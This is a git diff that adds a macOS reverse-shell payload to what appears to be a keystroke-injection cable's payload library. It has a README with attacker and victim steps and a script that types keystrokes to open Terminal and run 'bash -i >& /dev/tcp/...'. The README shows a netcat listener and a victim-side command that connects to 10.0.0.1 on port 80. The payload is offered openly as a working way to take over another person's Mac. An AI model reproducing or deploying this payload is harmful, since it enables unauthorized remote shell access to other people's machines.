diff --git a/payloads/library/remote_access/revshell_macOS/README.md.txt b/payloads/library/remote_access/revshell_macOS/README.md.txt new file mode 100644 index 0000000..2cd8ddf --- /dev/null +++ b/payloads/library/remote_access/revshell_macOS/README.md.txt @@ -0,0 +1,17 @@ +# This is, at heart, is a simple reverse shell to gain access to another MacOSX device. I'm looking into creating a tight shell that can run like a daemon +# but that is a wet dream atm. + +# FIRST STEP(s): +# run "nc -l " on the attackers machine +# This initialzes your computers listening protocol to look for TCP connections +**IMPORTANT** +# open another Terminal window and run "ipconfig getifaddr en0" to obtain your computers local ip (this is important for the next step) + +# NEXT STEP: +# Then simply run the script in your O.MG UI when the cable is connected + +# An example of the code run on the attackers computer: + nc -l 80 + +# An example of the code run on the victims computer: + bash -i >& /dev/tcp/10.0.0.1/80 0>&1 diff --git a/payloads/library/remote_access/revshell_macOS/revshell_macOS.txt b/payloads/library/remote_access/revshell_macOS/revshell_macOS.txt new file mode 100644 index 0000000..e029cfb --- /dev/null +++ b/payloads/library/remote_access/revshell_macOS/revshell_macOS.txt @@ -0,0 +1,20 @@ +REM Title: MacOSX Reverse Shell (v1.0) +REM Author: fatherthomas +REM Description: Allows you to traverse through any MacOS system and use bash commands to do what you please +REM Target: MacOS Monterey (or older versions) +REM Version: 1.0 + +GUI SPACE +DELAY 100 +STRING Terminal +DELAY 200 +ENTER +DELAY 900 +STRING bash +DELAY 100 +ENTER +DELAY 500 +STRING bash -i >& /dev/tcp// 0>&1 +DELAY 200 +ENTER +DELAY 1000 \ No newline at end of file